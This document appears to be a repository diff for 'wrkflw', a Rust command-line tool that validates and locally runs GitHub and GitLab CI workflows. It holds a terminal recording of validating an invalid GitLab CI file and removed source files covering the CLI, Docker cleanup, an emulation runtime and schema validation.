[75.175543, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[75.176254, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[75.17627, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[75.179062, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[75.181195, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[75.181307, "o", "\u001b[?1h\u001b="]
|
||||
[75.181372, "o", "\u001b[?2004h"]
|
||||
[78.644579, "o", "c"]
|
||||
[78.757216, "o", "\bca"]
|
||||
[79.422982, "o", "\b\bc \b"]
|
||||
[80.126467, "o", "\bcl"]
|
||||
[80.241618, "o", "e"]
|
||||
[80.499926, "o", "a"]
|
||||
[80.620047, "o", "r"]
|
||||
[80.768709, "o", "\u001b[?1l\u001b>"]
|
||||
[80.768793, "o", "\u001b[?2004l\r\r\n"]
|
||||
[80.770763, "o", "\u001b]2;clear\u0007\u001b]1;clear\u0007"]
|
||||
[80.796043, "o", "\u001b[3J\u001b[H\u001b[2J"]
|
||||
[80.796272, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[80.797072, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[80.799811, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[80.802093, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[80.802198, "o", "\u001b[?1h\u001b="]
|
||||
[80.802212, "o", "\u001b[?2004h"]
|
||||
[81.165962, "o", "c"]
|
||||
[81.237876, "o", "\bca"]
|
||||
[81.541593, "o", "r"]
|
||||
[81.632992, "o", "g"]
|
||||
[81.702718, "o", "o"]
|
||||
[81.811783, "o", " "]
|
||||
[82.041789, "o", "r"]
|
||||
[82.171861, "o", " "]
|
||||
[83.210945, "o", "-"]
|
||||
[83.370683, "o", "-"]
|
||||
[83.531883, "o", " "]
|
||||
[84.72197, "o", "v"]
|
||||
[85.400474, "o", "\b \b"]
|
||||
[85.531347, "o", "\b"]
|
||||
[85.666295, "o", "\b \b"]
|
||||
[85.92588, "o", "\b \b"]
|
||||
[86.620454, "o", "v"]
|
||||
[86.804257, "o", "a"]
|
||||
[86.911944, "o", "l"]
|
||||
[87.132942, "o", "i"]
|
||||
[87.276373, "o", "d"]
|
||||
[87.352783, "o", "a"]
|
||||
[87.544066, "o", "t"]
|
||||
[87.657321, "o", "e"]
|
||||
[87.785925, "o", " "]
|
||||
[88.963881, "o", "t"]
|
||||
[89.074873, "o", "e"]
|
||||
[89.258553, "o", "s"]
|
||||
[89.357494, "o", "t"]
|
||||
[89.816142, "o", "\u0007"]
|
||||
[89.816398, "o", "\r\r\n"]
|
||||
[89.816612, "o", "\u001b[J\u001b[1;36mtest_gitlab_ci\u001b[0m/ \u001b[J\u001b[1;36mtest-workflows\u001b[0m/ \u001b[J\u001b[1;36mtests\u001b[0m/ \u001b[J\u001b[A\u001b[0m\u001b[27m\u001b[24m\r\u001b[19Ccargo r validate test\u001b[K"]
|
||||
[90.569999, "o", "_"]
|
||||
[90.950079, "o", "g"]
|
||||
[91.040342, "o", "itlab_ci\u001b[1m/\u001b[0m"]
|
||||
[92.906492, "o", "\b\u001b[0m/m"]
|
||||
[93.078283, "o", "i"]
|
||||
[93.194416, "o", "nimal.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[94.398323, "o", "\b\u001b[0m \b"]
|
||||
[94.899238, "o", "\b \b"]
|
||||
[94.982652, "o", "\b \b"]
|
||||
[95.065722, "o", "\b \b"]
|
||||
[95.149466, "o", "\b \b"]
|
||||
[95.233618, "o", "\b \b"]
|
||||
[95.317716, "o", "\b \b"]
|
||||
[95.4019, "o", "\b \b"]
|
||||
[95.485971, "o", "\b \b"]
|
||||
[95.569449, "o", "\b \b"]
|
||||
[95.653691, "o", "\b \b"]
|
||||
[95.736766, "o", "\b \b"]
|
||||
[95.82133, "o", "\b \b"]
|
||||
[95.905257, "o", "\b \b"]
|
||||
[95.988404, "o", "\b \b"]
|
||||
[96.072177, "o", "\b \b"]
|
||||
[96.156204, "o", "\b \b"]
|
||||
[96.240362, "o", "\b \b"]
|
||||
[96.324551, "o", "\b \b"]
|
||||
[96.513245, "o", "\b \b"]
|
||||
[96.673025, "o", "\b \b"]
|
||||
[96.851629, "o", "\b \b"]
|
||||
[97.496169, "o", "i"]
|
||||
[97.698031, "o", "n"]
|
||||
[97.987174, "o", "v"]
|
||||
[98.138347, "o", "alid.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[98.957859, "o", "\b\u001b[0m \b"]
|
||||
[98.958383, "o", "\u001b[?1l\u001b>\u001b[?2004l\r\r\n\u001b[J"]
|
||||
[98.960319, "o", "\u001b]2;cargo r validate test_gitlab_ci/invalid.gitlab-ci.yml\u0007\u001b]1;cargo\u0007"]
|
||||
[99.107154, "o", "\u001b[1m\u001b[32m Finished\u001b[0m `dev` profile [unoptimized + debuginfo] target(s) in 0.09s\r\n"]
|
||||
[99.114895, "o", "\u001b[1m\u001b[32m Running\u001b[0m `target/debug/wrkflw validate test_gitlab_ci/invalid.gitlab-ci.yml`\r\n"]
|
||||
[99.636477, "o", "Validating GitLab CI pipeline file: test_gitlab_ci/invalid.gitlab-ci.yml... ❌ Invalid\r\nValidation failed: Schema validation error: GitLab CI validation failed:\r\n- {\"key\":[\"invalid\",\"key\",\"type\"],\"paths\":[\"${CARGO_HOME}\"],\"policy\":\"invalid-policy\"} is not valid under any of the schemas listed in the 'oneOf' keyword\r\n- \"hello\" is not valid under any of the schemas listed in the 'oneOf' keyword\r\n- Additional properties are not allowed ('scriptt', 'stagee' were unexpected)\r\n- {\"equals\":\"$CI_COMMIT_BRANCH == \\\"main\\\"\"} is not valid under any of the schemas listed in the 'anyOf' keyword\r\n\r\n"]
|
||||
[99.637323, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[99.638217, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[99.638226, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[99.639979, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[99.642108, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[99.642189, "o", "\u001b[?1h\u001b="]
|
||||
[99.642244, "o", "\u001b[?2004h"]
|
||||
[101.389433, "o", "c"]
|
||||
[101.489821, "o", "\bca"]
|
||||
[101.781592, "o", "r"]
|
||||
[101.870935, "o", "g"]
|
||||
[101.913828, "o", "o"]
|
||||
[102.021608, "o", " "]
|
||||
[102.173967, "o", "r"]
|
||||
[102.282804, "o", " "]
|
||||
[103.113368, "o", "-"]
|
||||
[103.251079, "o", "-"]
|
||||
[103.3802, "o", " "]
|
||||
[103.637955, "o", "r"]
|
||||
[103.756731, "o", "u"]
|
||||
[104.035863, "o", " "]
|
||||
[104.396646, "o", "\b"]
|
||||
[104.88292, "o", "n"]
|
||||
[104.97564, "o", " "]
|
||||
[106.361505, "o", "t"]
|
||||
[106.453323, "o", "e"]
|
||||
[106.66181, "o", "s"]
|
||||
[106.761957, "o", "t"]
|
||||
[107.423959, "o", "_"]
|
||||
[107.591679, "o", "gitlab_ci\u001b[1m/\u001b[0m"]
|
||||
[109.594052, "o", "\b\u001b[0m/i"]
|
||||
[109.78732, "o", "n"]
|
||||
[110.089516, "o", "v"]
|
||||
[110.259654, "o", "alid.gitlab-ci.yml\u001b[1m \u001b[0m"]
|
||||
[112.918071, "o", "\b\u001b[0m -"]
|
||||
[113.487665, "o", "e"]
|
||||
[114.05841, "o", "\u001b[?1l\u001b>"]
|
||||
[114.05869, "o", "\u001b[?2004l\r\r\n"]
|
||||
[114.060284, "o", "\u001b]2;cargo r -- run test_gitlab_ci/invalid.gitlab-ci.yml -e\u0007\u001b]1;cargo\u0007"]
|
||||
[114.193654, "o", "\u001b[1m\u001b[32m Finished\u001b[0m `dev` profile [unoptimized + debuginfo] target(s) in 0.09s\r\n"]
|
||||
[114.200619, "o", "\u001b[1m\u001b[32m Running\u001b[0m `target/debug/wrkflw run test_gitlab_ci/invalid.gitlab-ci.yml -e`\r\n"]
|
||||
[114.727902, "o", "Error executing workflow: Parse error: Failed to parse GitLab pipeline: Schema validation error: GitLab CI validation failed:\r\n- {\"key\":[\"invalid\",\"key\",\"type\"],\"paths\":[\"${CARGO_HOME}\"],\"policy\":\"invalid-policy\"} is not valid under any of the schemas listed in the 'oneOf' keyword\r\n- \"hello\" is not valid under any of the schemas listed in the 'oneOf' keyword\r\n- Additional properties are not allowed ('scriptt', 'stagee' were unexpected)\r\n- {\"equals\":\"$CI_COMMIT_BRANCH == \\\"main\\\"\"} is not valid under any of the schemas listed in the 'anyOf' keyword\r\n\r\n"]
|
||||
[114.728458, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"]
|
||||
[114.72932, "o", "\u001b]2;goku@Gokuls-MacBook-Pro:~/projects/wrkflw\u0007"]
|
||||
[114.729328, "o", "\u001b]1;..ojects/wrkflw\u0007"]
|
||||
[114.731093, "o", "\u001b]7;file://Gokuls-MacBook-Pro.local/Users/goku/projects/wrkflw\u001b\\"]
|
||||
[114.732938, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜ \u001b[36mwrkflw\u001b[00m \u001b[01;34m(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
|
||||
[114.73302, "o", "\u001b[?1h\u001b="]
|
||||
[114.733045, "o", "\u001b[?2004h"]
|
||||
[118.210217, "o", "\u001b[?2004l\r\r\n"]
|
||||
schemas/gitlab-ci.json (3012 lines changed, normal file)
File diff suppressed because it is too large
@@ -1,44 +0,0 @@
#[async_trait]
impl ContainerRuntime for EmulationRuntime {
    async fn run_container(
        &self,
        image: &str,
        cmd: &[&str],
        env_vars: &[(&str, &str)],
        working_dir: &Path,
        volumes: &[(&Path, &Path)],
    ) -> Result<ContainerOutput, ContainerError> {
        // ... existing code ...
    }

    async fn pull_image(&self, image: &str) -> Result<(), ContainerError> {
        // ... existing code ...
    }

    async fn build_image(&self, dockerfile: &Path, tag: &str) -> Result<(), ContainerError> {
        // ... existing code ...
    }

    async fn prepare_language_environment(
        &self,
        language: &str,
        version: Option<&str>,
        additional_packages: Option<Vec<String>>,
    ) -> Result<String, ContainerError> {
        // For emulation runtime, we'll use a simplified approach
        // that doesn't require building custom images
        let base_image = match language {
            "python" => version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v)),
            "node" => version.map_or("node:20-slim".to_string(), |v| format!("node:{}", v)),
            "java" => version.map_or("eclipse-temurin:17-jdk".to_string(), |v| format!("eclipse-temurin:{}", v)),
            "go" => version.map_or("golang:1.21-slim".to_string(), |v| format!("golang:{}", v)),
            "dotnet" => version.map_or("mcr.microsoft.com/dotnet/sdk:7.0".to_string(), |v| format!("mcr.microsoft.com/dotnet/sdk:{}", v)),
            "rust" => version.map_or("rust:latest".to_string(), |v| format!("rust:{}", v)),
            _ => return Err(ContainerError::ContainerStart(format!("Unsupported language: {}", language))),
        };

        // For emulation, we'll just return the base image
        // The actual package installation will be handled during container execution
        Ok(base_image)
    }
}
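The `prepare_language_environment` method above resolves a language name and optional version to a base image with `Option::map_or`: no version means the pinned default, an explicit version is interpolated into the tag. A minimal, self-contained sketch of that fallback behaviour (the `python_image` helper and the `main` harness are illustrative only, not part of the crate):

```rust
/// Illustrative only: mirrors the Option::map_or fallback used in
/// prepare_language_environment above for the "python" arm.
fn python_image(version: Option<&str>) -> String {
    version.map_or("python:3.11-slim".to_string(), |v| format!("python:{}", v))
}

fn main() {
    // No version requested: fall back to the pinned default image.
    assert_eq!(python_image(None), "python:3.11-slim");
    // Explicit version: interpolate it into the image tag.
    assert_eq!(python_image(Some("3.12")), "python:3.12");
}
```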
src/lib.rs (52 lines changed)
@@ -1,52 +0,0 @@
pub mod evaluator;
pub mod executor;
pub mod github;
pub mod gitlab;
pub mod logging;
pub mod matrix;
pub mod models;
pub mod parser;
pub mod runtime;
pub mod ui;
pub mod utils;
pub mod validators;

use bollard::Docker;

/// Clean up all resources when exiting the application
/// This is used by both main.rs and in tests
pub async fn cleanup_on_exit() {
    // Clean up Docker resources if available, but don't let it block indefinitely
    match tokio::time::timeout(std::time::Duration::from_secs(3), async {
        match Docker::connect_with_local_defaults() {
            Ok(docker) => {
                let _ = executor::docker::cleanup_containers(&docker).await;
                let _ = executor::docker::cleanup_networks(&docker).await;
            }
            Err(_) => {
                // Docker not available
                logging::info("Docker not available, skipping Docker cleanup");
            }
        }
    })
    .await
    {
        Ok(_) => logging::debug("Docker cleanup completed successfully"),
        Err(_) => {
            logging::warning("Docker cleanup timed out after 3 seconds, continuing with shutdown")
        }
    }

    // Always clean up emulation resources
    match tokio::time::timeout(
        std::time::Duration::from_secs(2),
        runtime::emulation::cleanup_resources(),
    )
    .await
    {
        Ok(_) => logging::debug("Emulation cleanup completed successfully"),
        Err(_) => logging::warning("Emulation cleanup timed out, continuing with shutdown"),
    }

    logging::info("Resource cleanup completed");
}
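`cleanup_on_exit` bounds each cleanup phase with `tokio::time::timeout` so a hung Docker daemon cannot stall shutdown. A minimal sketch of that pattern in isolation, assuming a binary with the `tokio` crate available (the `slow_cleanup` future is a stand-in for the Docker calls, not the crate's real cleanup code):

```rust
use std::time::Duration;

#[tokio::main]
async fn main() {
    // Stand-in for a cleanup call that might hang (e.g. an unresponsive Docker API).
    let slow_cleanup = async {
        tokio::time::sleep(Duration::from_secs(10)).await;
    };

    // Bound the wait: shutdown proceeds either way, as cleanup_on_exit does above.
    match tokio::time::timeout(Duration::from_secs(3), slow_cleanup).await {
        Ok(()) => println!("cleanup completed"),
        Err(_) => println!("cleanup timed out, continuing with shutdown"),
    }
}
```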
src/main.rs (472 lines changed)
@@ -1,472 +0,0 @@
// Import public modules from lib.rs
use wrkflw::*;

use bollard::Docker;
use clap::{Parser, Subcommand};
use std::collections::HashMap;
use std::path::PathBuf;

#[derive(Debug, Parser)]
#[command(
    name = "wrkflw",
    about = "GitHub Workflow validator and executor",
    version,
    long_about = "A GitHub Workflow validator and executor that runs workflows locally.\n\nExamples:\n wrkflw validate # Validate all workflows in .github/workflows\n wrkflw run .github/workflows/build.yml # Run a specific workflow\n wrkflw --verbose run .github/workflows/build.yml # Run with more output\n wrkflw --debug run .github/workflows/build.yml # Run with detailed debug information\n wrkflw run --emulate .github/workflows/build.yml # Use emulation mode instead of Docker"
)]
struct Wrkflw {
    #[command(subcommand)]
    command: Option<Commands>,

    /// Run in verbose mode with detailed output
    #[arg(short, long, global = true)]
    verbose: bool,

    /// Run in debug mode with extensive execution details
    #[arg(short, long, global = true)]
    debug: bool,
}

#[derive(Debug, Subcommand)]
enum Commands {
    /// Validate GitHub workflow files
    Validate {
        /// Path to workflow file or directory (defaults to .github/workflows)
        path: Option<PathBuf>,
    },

    /// Execute GitHub workflow files locally
    Run {
        /// Path to workflow file to execute
        path: PathBuf,

        /// Use emulation mode instead of Docker
        #[arg(short, long)]
        emulate: bool,

        /// Show 'Would execute GitHub action' messages in emulation mode
        #[arg(long, default_value_t = false)]
        show_action_messages: bool,
    },

    /// Open TUI interface to manage workflows
    Tui {
        /// Path to workflow file or directory (defaults to .github/workflows)
        path: Option<PathBuf>,

        /// Use emulation mode instead of Docker
        #[arg(short, long)]
        emulate: bool,

        /// Show 'Would execute GitHub action' messages in emulation mode
        #[arg(long, default_value_t = false)]
        show_action_messages: bool,
    },

    /// Trigger a GitHub workflow remotely
    Trigger {
        /// Name of the workflow file (without .yml extension)
        workflow: String,

        /// Branch to run the workflow on
        #[arg(short, long)]
        branch: Option<String>,

        /// Key-value inputs for the workflow in format key=value
        #[arg(short, long, value_parser = parse_key_val)]
        input: Option<Vec<(String, String)>>,
    },

    /// Trigger a GitLab pipeline remotely
    TriggerGitlab {
        /// Branch to run the pipeline on
        #[arg(short, long)]
        branch: Option<String>,

        /// Key-value variables for the pipeline in format key=value
        #[arg(short = 'V', long, value_parser = parse_key_val)]
        variable: Option<Vec<(String, String)>>,
    },

    /// List available workflows
    List,
}

// Parser function for key-value pairs
fn parse_key_val(s: &str) -> Result<(String, String), String> {
    let pos = s
        .find('=')
        .ok_or_else(|| format!("invalid KEY=value: no `=` found in `{}`", s))?;

    Ok((s[..pos].to_string(), s[pos + 1..].to_string()))
}

// Make this function public for testing
pub async fn cleanup_on_exit() {
    // Clean up Docker resources if available, but don't let it block indefinitely
    match tokio::time::timeout(std::time::Duration::from_secs(3), async {
        match Docker::connect_with_local_defaults() {
            Ok(docker) => {
                executor::cleanup_resources(&docker).await;
            }
            Err(_) => {
                // Docker not available
                logging::info("Docker not available, skipping Docker cleanup");
            }
        }
    })
    .await
    {
        Ok(_) => logging::debug("Docker cleanup completed successfully"),
        Err(_) => {
            logging::warning("Docker cleanup timed out after 3 seconds, continuing with shutdown")
        }
    }

    // Always clean up emulation resources
    match tokio::time::timeout(
        std::time::Duration::from_secs(2),
        runtime::emulation::cleanup_resources(),
    )
    .await
    {
        Ok(_) => logging::debug("Emulation cleanup completed successfully"),
        Err(_) => logging::warning("Emulation cleanup timed out, continuing with shutdown"),
    }

    logging::info("Resource cleanup completed");
}

async fn handle_signals() {
    // Set up a hard exit timer in case cleanup takes too long
    // This ensures the app always exits even if Docker operations are stuck
    let hard_exit_time = std::time::Duration::from_secs(10);

    // Wait for Ctrl+C
    match tokio::signal::ctrl_c().await {
        Ok(_) => {
            println!("Received Ctrl+C, shutting down and cleaning up...");
        }
        Err(e) => {
            // Log the error but continue with cleanup
            eprintln!("Warning: Failed to properly listen for ctrl+c event: {}", e);
            println!("Shutting down and cleaning up...");
        }
    }

    // Set up a watchdog thread that will force exit if cleanup takes too long
    // This is important because Docker operations can sometimes hang indefinitely
    let _ = std::thread::spawn(move || {
        std::thread::sleep(hard_exit_time);
        eprintln!(
            "Cleanup taking too long (over {} seconds), forcing exit...",
            hard_exit_time.as_secs()
        );
        logging::error("Forced exit due to cleanup timeout");
        std::process::exit(1);
    });

    // Clean up containers
    cleanup_on_exit().await;

    // Exit with success status - the force exit thread will be terminated automatically
    std::process::exit(0);
}

#[tokio::main]
async fn main() {
    let cli = Wrkflw::parse();
    let verbose = cli.verbose;
    let debug = cli.debug;

    // Set log level based on command line flags
    if debug {
        logging::set_log_level(logging::LogLevel::Debug);
        logging::debug("Debug mode enabled - showing detailed logs");
    } else if verbose {
        logging::set_log_level(logging::LogLevel::Info);
        logging::info("Verbose mode enabled");
    } else {
        logging::set_log_level(logging::LogLevel::Warning);
    }

    // Setup a Ctrl+C handler that runs in the background
    tokio::spawn(handle_signals());

    match &cli.command {
        Some(Commands::Validate { path }) => {
            // Determine the path to validate
            let validate_path = path
                .clone()
                .unwrap_or_else(|| PathBuf::from(".github/workflows"));

            // Run the validation
            ui::validate_workflow(&validate_path, verbose).unwrap_or_else(|e| {
                eprintln!("Error: {}", e);
                std::process::exit(1);
            });
        }

        Some(Commands::Run {
            path,
            emulate,
            show_action_messages: _,
        }) => {
            // Set runner mode based on flags
            let runtime_type = if *emulate {
                executor::RuntimeType::Emulation
            } else {
                executor::RuntimeType::Docker
            };

            // First validate the workflow file
            match parser::workflow::parse_workflow(path) {
                Ok(_) => logging::info("Validating workflow..."),
                Err(e) => {
                    logging::error(&format!("Workflow validation failed: {}", e));
                    std::process::exit(1);
                }
            }

            // Execute the workflow
            match executor::execute_workflow(path, runtime_type, verbose || debug).await {
                Ok(result) => {
                    // Print job results
                    for job in &result.jobs {
                        println!(
                            "\n{} Job {}: {}",
                            if job.status == executor::JobStatus::Success {
                                "✅"
                            } else {
                                "❌"
                            },
                            job.name,
                            if job.status == executor::JobStatus::Success {
                                "succeeded"
                            } else {
                                "failed"
                            }
                        );

                        // Print step results
                        for step in &job.steps {
                            println!(
                                " {} {}",
                                if step.status == executor::StepStatus::Success {
                                    "✅"
                                } else {
                                    "❌"
                                },
                                step.name
                            );

                            if !step.output.trim().is_empty() {
                                // If the output is very long, trim it
                                let output_lines = step.output.lines().collect::<Vec<&str>>();

                                println!(" Output:");

                                // In verbose mode, show complete output
                                if verbose || debug {
                                    for line in &output_lines {
                                        println!(" {}", line);
                                    }
                                } else {
                                    // Show only the first few lines
                                    let max_lines = 5;
                                    for line in output_lines.iter().take(max_lines) {
                                        println!(" {}", line);
                                    }

                                    if output_lines.len() > max_lines {
                                        println!(" ... ({} more lines, use --verbose to see full output)",
                                            output_lines.len() - max_lines);
                                    }
                                }
                            }
                        }
                    }

                    // Print detailed failure information if available
                    if let Some(failure_details) = &result.failure_details {
                        println!("\n❌ Workflow execution failed!");
                        println!("{}", failure_details);
                        println!("\nTo fix these issues:");
                        println!("1. Check the formatting issues with: cargo fmt");
                        println!("2. Fix clippy warnings with: cargo clippy -- -D warnings");
                        println!("3. Run tests to ensure everything passes: cargo test");
                        std::process::exit(1);
                    } else {
                        println!("\n✅ Workflow completed successfully!");
                    }
                }
                Err(e) => {
                    logging::error(&format!("Workflow execution failed: {}", e));
                    std::process::exit(1);
                }
            }
        }

        Some(Commands::Tui {
            path,
            emulate,
            show_action_messages,
        }) => {
            // Open the TUI interface
            let runtime_type = if *emulate {
                executor::RuntimeType::Emulation
            } else {
                // Check if Docker is available, fall back to emulation if not
                if !executor::docker::is_available() {
                    println!("⚠️ Docker is not available. Using emulation mode instead.");
                    logging::warning("Docker is not available. Using emulation mode instead.");
                    executor::RuntimeType::Emulation
                } else {
                    executor::RuntimeType::Docker
                }
            };

            // Control hiding action messages based on the flag
            if !show_action_messages {
                std::env::set_var("WRKFLW_HIDE_ACTION_MESSAGES", "true");
            } else {
                std::env::set_var("WRKFLW_HIDE_ACTION_MESSAGES", "false");
            }

            match ui::run_wrkflw_tui(path.as_ref(), runtime_type, verbose).await {
                Ok(_) => {
                    // Clean up on successful exit
                    cleanup_on_exit().await;
                }
                Err(e) => {
                    eprintln!("Error: {}", e);
                    cleanup_on_exit().await;
                    std::process::exit(1);
                }
            }
        }

        Some(Commands::Trigger {
            workflow,
            branch,
            input,
        }) => {
            logging::info(&format!("Triggering workflow {} on GitHub", workflow));

            // Convert inputs to HashMap
            let input_map = input.as_ref().map(|i| {
                i.iter()
                    .map(|(k, v)| (k.clone(), v.clone()))
                    .collect::<HashMap<String, String>>()
            });

            match github::trigger_workflow(workflow, branch.as_deref(), input_map).await {
                Ok(_) => logging::info("Workflow triggered successfully"),
                Err(e) => {
                    eprintln!("Error triggering workflow: {}", e);
                    std::process::exit(1);
                }
            }
        }

        Some(Commands::TriggerGitlab { branch, variable }) => {
            logging::info("Triggering pipeline on GitLab");

            // Convert variables to HashMap
            let variable_map = variable.as_ref().map(|v| {
                v.iter()
                    .map(|(k, v)| (k.clone(), v.clone()))
                    .collect::<HashMap<String, String>>()
            });

            match gitlab::trigger_pipeline(branch.as_deref(), variable_map).await {
                Ok(_) => logging::info("GitLab pipeline triggered successfully"),
                Err(e) => {
                    eprintln!("Error triggering GitLab pipeline: {}", e);
                    std::process::exit(1);
                }
            }
        }

        Some(Commands::List) => {
            logging::info("Listing available workflows");

            // Attempt to get GitHub repo info
            if let Ok(repo_info) = github::get_repo_info() {
                match github::list_workflows(&repo_info).await {
                    Ok(workflows) => {
                        if workflows.is_empty() {
                            println!("No GitHub workflows found in repository");
                        } else {
                            println!("GitHub workflows:");
                            for workflow in workflows {
                                println!(" {}", workflow);
                            }
                        }
                    }
                    Err(e) => {
                        eprintln!("Error listing GitHub workflows: {}", e);
                    }
                }
            } else {
                println!("Not a GitHub repository or unable to get repository information");
            }

            // Attempt to get GitLab repo info
            if let Ok(repo_info) = gitlab::get_repo_info() {
                match gitlab::list_pipelines(&repo_info).await {
                    Ok(pipelines) => {
                        if pipelines.is_empty() {
                            println!("No GitLab pipelines found in repository");
                        } else {
                            println!("GitLab pipelines:");
                            for pipeline in pipelines {
                                println!(" {}", pipeline);
                            }
                        }
                    }
                    Err(e) => {
                        eprintln!("Error listing GitLab pipelines: {}", e);
                    }
                }
            } else {
                println!("Not a GitLab repository or unable to get repository information");
            }
        }

        None => {
            // Default to TUI interface if no subcommand
            // Check if Docker is available, fall back to emulation if not
            let runtime_type = if !executor::docker::is_available() {
                println!("⚠️ Docker is not available. Using emulation mode instead.");
                logging::warning("Docker is not available. Using emulation mode instead.");
                executor::RuntimeType::Emulation
            } else {
                executor::RuntimeType::Docker
            };

            // Set environment variable to hide action messages by default
            std::env::set_var("WRKFLW_HIDE_ACTION_MESSAGES", "true");

            match ui::run_wrkflw_tui(
                Some(&PathBuf::from(".github/workflows")),
                runtime_type,
                verbose,
            )
            .await
            {
                Ok(_) => {
                    // Clean up on successful exit
                    cleanup_on_exit().await;
                }
                Err(e) => {
                    eprintln!("Error: {}", e);
                    cleanup_on_exit().await;
                    std::process::exit(1);
                }
            }
        }
    }

    // Final cleanup before program exit
    cleanup_on_exit().await;
}
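The `--input` and `--variable` flags are parsed with `parse_key_val`, which splits on the first `=` only, so values may themselves contain `=`. A small standalone check of that behaviour (the function body is copied from main.rs above; the `main` harness and sample pairs are illustrative):

```rust
fn parse_key_val(s: &str) -> Result<(String, String), String> {
    let pos = s
        .find('=')
        .ok_or_else(|| format!("invalid KEY=value: no `=` found in `{}`", s))?;

    Ok((s[..pos].to_string(), s[pos + 1..].to_string()))
}

fn main() {
    // Plain key=value pair.
    assert_eq!(
        parse_key_val("branch=main"),
        Ok(("branch".to_string(), "main".to_string()))
    );
    // Only the first '=' splits, so the value keeps any later '='.
    assert_eq!(
        parse_key_val("opts=a=b"),
        Ok(("opts".to_string(), "a=b".to_string()))
    );
    // Missing '=' is rejected with a descriptive error.
    assert!(parse_key_val("no-equals-here").is_err());
}
```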
@@ -1,24 +0,0 @@
pub struct ValidationResult {
    pub is_valid: bool,
    pub issues: Vec<String>,
}

impl Default for ValidationResult {
    fn default() -> Self {
        Self::new()
    }
}

impl ValidationResult {
    pub fn new() -> Self {
        ValidationResult {
            is_valid: true,
            issues: Vec::new(),
        }
    }

    pub fn add_issue(&mut self, issue: String) {
        self.is_valid = false;
        self.issues.push(issue);
    }
}
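A short usage sketch of the result type, assuming the `ValidationResult` defined above is in scope (the issue message is illustrative only):

```rust
fn main() {
    let mut result = ValidationResult::new();
    assert!(result.is_valid);

    // Recording an issue marks the result invalid and keeps the message.
    result.add_issue("example issue: missing required field".to_string());
    assert!(!result.is_valid);
    assert_eq!(result.issues.len(), 1);
}
```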
@@ -1,43 +0,0 @@
use jsonschema::JSONSchema;
use serde_json::Value;
use std::fs;
use std::path::Path;

const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("../../schemas/github-workflow.json");

pub struct SchemaValidator {
    schema: JSONSchema,
}

impl SchemaValidator {
    pub fn new() -> Result<Self, String> {
        let schema_json: Value = serde_json::from_str(GITHUB_WORKFLOW_SCHEMA)
            .map_err(|e| format!("Failed to parse GitHub workflow schema: {}", e))?;

        let schema = JSONSchema::compile(&schema_json)
            .map_err(|e| format!("Failed to compile JSON schema: {}", e))?;

        Ok(Self { schema })
    }

    pub fn validate_workflow(&self, workflow_path: &Path) -> Result<(), String> {
        // Read the workflow file
        let content = fs::read_to_string(workflow_path)
            .map_err(|e| format!("Failed to read workflow file: {}", e))?;

        // Parse YAML to JSON Value
        let workflow_json: Value = serde_yaml::from_str(&content)
            .map_err(|e| format!("Failed to parse workflow YAML: {}", e))?;

        // Validate against schema
        if let Err(errors) = self.schema.validate(&workflow_json) {
            let mut error_msg = String::from("Workflow validation failed:\n");
            for error in errors {
                error_msg.push_str(&format!("- {}\n", error));
            }
            return Err(error_msg);
        }

        Ok(())
    }
}
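A minimal usage sketch, assuming the `SchemaValidator` defined above is in scope and that a workflow file exists at the illustrative path:

```rust
use std::path::Path;

fn main() {
    // Compile the embedded GitHub workflow schema once, then reuse the validator.
    let validator = SchemaValidator::new().expect("embedded schema should compile");

    // The path is illustrative; point it at any workflow YAML to check.
    match validator.validate_workflow(Path::new(".github/workflows/ci.yml")) {
        Ok(()) => println!("workflow matches the GitHub workflow schema"),
        Err(message) => eprintln!("{}", message),
    }
}
```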
@@ -1,2 +0,0 @@
pub mod container;
pub mod emulation;
Some files were not shown because too many files have changed in this diff.